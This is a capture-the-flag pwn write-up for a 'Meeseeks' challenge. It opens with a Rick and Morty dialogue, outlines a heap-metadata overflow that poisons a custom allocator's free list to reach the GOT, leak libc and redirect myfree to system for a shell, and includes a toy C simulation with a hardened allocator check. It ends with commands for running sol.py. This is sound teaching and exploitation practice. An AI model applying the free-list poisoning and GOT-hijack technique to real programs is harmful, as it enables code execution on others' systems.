Category: pwn
Author: condiom
Rick: This is a Meeseeks box. Let me show you how it works. You press this.
(meeseeks spawns)
Meeseeks: I'm Mr. Meeseeks! Look at me!
Rick: You make a request. Mr. Meeseeks, open Jerry's stupid mayonnaise jar.
Meeseeks: Yes, siree!
(Meeseeks grabs mayonnaise jar as Rick explains.)
Rick: The Meeseeks fulfills the request.
(Meeseeks opens the jar and hands it to Jerry.)
Meeseeks: All done!
Jerry: [amazed] Wow!
Rick: And then it stops existing.
(Meeseeks vanishes into particles in air.)
Solution (spoiler):
The challenge ships a custom implementation of a heap memory management library.
When a Mr. Meeseeks is created, a buffer overflow lets you overwrite the metadata of the next heap chunk.
The goal is to trick the custom library into handing out a chunk that points at the GOT, and to use it to leak a libc address without breaking the execution flow.
Then overwrite the GOT entry of the custom library's myfree with the address of system and call it with a "/bin/sh" string to get a shell.
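As an added illustration (not the challenge binary and not sol.py, whose allocator internals the page does not show), the C program below builds a toy free-list allocator with the one property the spoiler relies on: the chunk header (size, next) sits directly in front of the user data and is trusted blindly. Overflowing chunk 0 rewrites the freed neighbour's next link, so the second allocation after that hands out whatever address the attacker chose. Here that is a simulated two-slot GOT (`got_page`, with `real_puts` standing in for the libc symbol to leak and `evil_system` for system), which the exploit first reads for the leak and then writes to redirect "myfree". The names, the fixed 32-byte chunks and the in-process GOT stand-in are all assumptions made for this example; `toy_malloc_checked` shows the arena-bounds check on free-list links that stops the forged pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added example, not the challenge's allocator: a toy free-list allocator whose
 * chunk header (size, next) sits directly in front of the user data, so an
 * overflow from one chunk rewrites the next chunk's header. */
struct chunk {
    size_t size;         /* never validated by this allocator */
    struct chunk *next;  /* free-list link, trusted blindly */
};

#define CHUNK_SZ 32
#define NCHUNKS  4
#define SLOT_SZ  (sizeof(struct chunk) + CHUNK_SZ)

static _Alignas(16) unsigned char arena[NCHUNKS * SLOT_SZ];
static struct chunk *free_list;

static void toy_init(void) {
    free_list = NULL;
    for (int i = NCHUNKS - 1; i >= 0; i--) {      /* push in reverse: chunk 0 ends up first */
        struct chunk *c = (struct chunk *)(arena + i * SLOT_SZ);
        c->size = CHUNK_SZ;
        c->next = free_list;
        free_list = c;
    }
}

/* Vulnerable: pops whatever the header says is next, wherever it points. */
static void *toy_malloc(void) {
    struct chunk *c = free_list;
    if (!c) return NULL;
    free_list = c->next;
    return c + 1;                                  /* user data starts right after the header */
}

/* Hardened variant: a free-list link must stay inside the arena. */
static void *toy_malloc_checked(void) {
    struct chunk *c = free_list;
    if (!c) return NULL;
    uintptr_t n = (uintptr_t)c->next, lo = (uintptr_t)arena, hi = lo + sizeof arena;
    if (c->next && (n < lo || n >= hi)) return NULL;   /* forged link: refuse */
    free_list = c->next;
    return c + 1;
}

static void toy_free(void *p) {
    struct chunk *c = (struct chunk *)p - 1;
    c->next = free_list;                           /* push on the free-list head */
    free_list = c;
}

/* Stand-in (assumed) for the binary's GOT: two function-pointer slots, "puts" and
 * "myfree". The hdr field plays the bytes that precede the table in memory and get
 * read as a chunk header once the allocator is pointed here. */
typedef int (*fn_t)(const char *);
static int real_puts(const char *s) { return (int)strlen(s); }    /* plays the libc symbol to leak */
static int evil_system(const char *s) { return s[0] == '/'; }     /* plays system(): 1 means "/bin/sh ran" */
static struct { struct chunk hdr; fn_t got[2]; } got_page = { {0, NULL}, { real_puts, real_puts } };

struct result { uintptr_t leaked; int hijacked; };

static struct result exploit_against(void *(*alloc)(void)) {
    struct result r = { 0, 0 };
    toy_init();
    got_page.got[1] = real_puts;                   /* restore "myfree" between runs */

    char *a = alloc();                             /* chunk 0: the Meeseeks we overflow from */
    char *b = alloc();                             /* chunk 1: its neighbour */
    toy_free(b);                                   /* chunk 1 heads the free list again */

    /* Overflow: CHUNK_SZ bytes of filler, then a forged header for chunk 1
     * whose next link points at our fake GOT page. */
    unsigned char payload[CHUNK_SZ + sizeof(struct chunk)];
    memset(payload, 'A', CHUNK_SZ);
    size_t fake_size = CHUNK_SZ;
    struct chunk *fake_next = &got_page.hdr;
    memcpy(payload + CHUNK_SZ, &fake_size, sizeof fake_size);
    memcpy(payload + CHUNK_SZ + sizeof fake_size, &fake_next, sizeof fake_next);
    memcpy(a, payload, sizeof payload);            /* the unbounded copy the challenge has */

    if (alloc() != (void *)b) return r;            /* pops chunk 1; free list now = forged link */
    fn_t *g = alloc();                             /* hands out the GOT itself */
    if (g != got_page.got) return r;

    r.leaked = (uintptr_t)g[0];                    /* read: the libc address leaks, flow intact */
    g[1] = evil_system;                            /* write: myfree@GOT -> system */
    r.hijacked = got_page.got[1]("/bin/sh");       /* the program's next myfree("/bin/sh") */
    return r;
}

struct result run_exploit(void)          { return exploit_against(toy_malloc); }
struct result run_exploit_hardened(void) { return exploit_against(toy_malloc_checked); }

int main(void) {
    struct result v = run_exploit(), h = run_exploit_hardened();
    printf("vulnerable: leaked %#lx, hijacked=%d\n", (unsigned long)v.leaked, v.hijacked);
    printf("hardened:   hijacked=%d\n", h.hijacked);
    return 0;
}
```

Build with `cc -o meeseeks meeseeks.c && ./meeseeks`. The leak step matters because the fake-chunk read keeps the program running normally: nothing is written to the GOT until the libc base is known, which is what "without breaking the execution flow" refers to. The hardened variant refuses the first allocation after the overflow, which is also where a real allocator would abort.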
A solution that performs the steps above is provided in sol.py. Run it as follows:
Against the local Docker container:
python3.7 sol.py R LHOST
Against CyberRanges (the target IP set in sol.py may need updating):
python3.7 sol.py R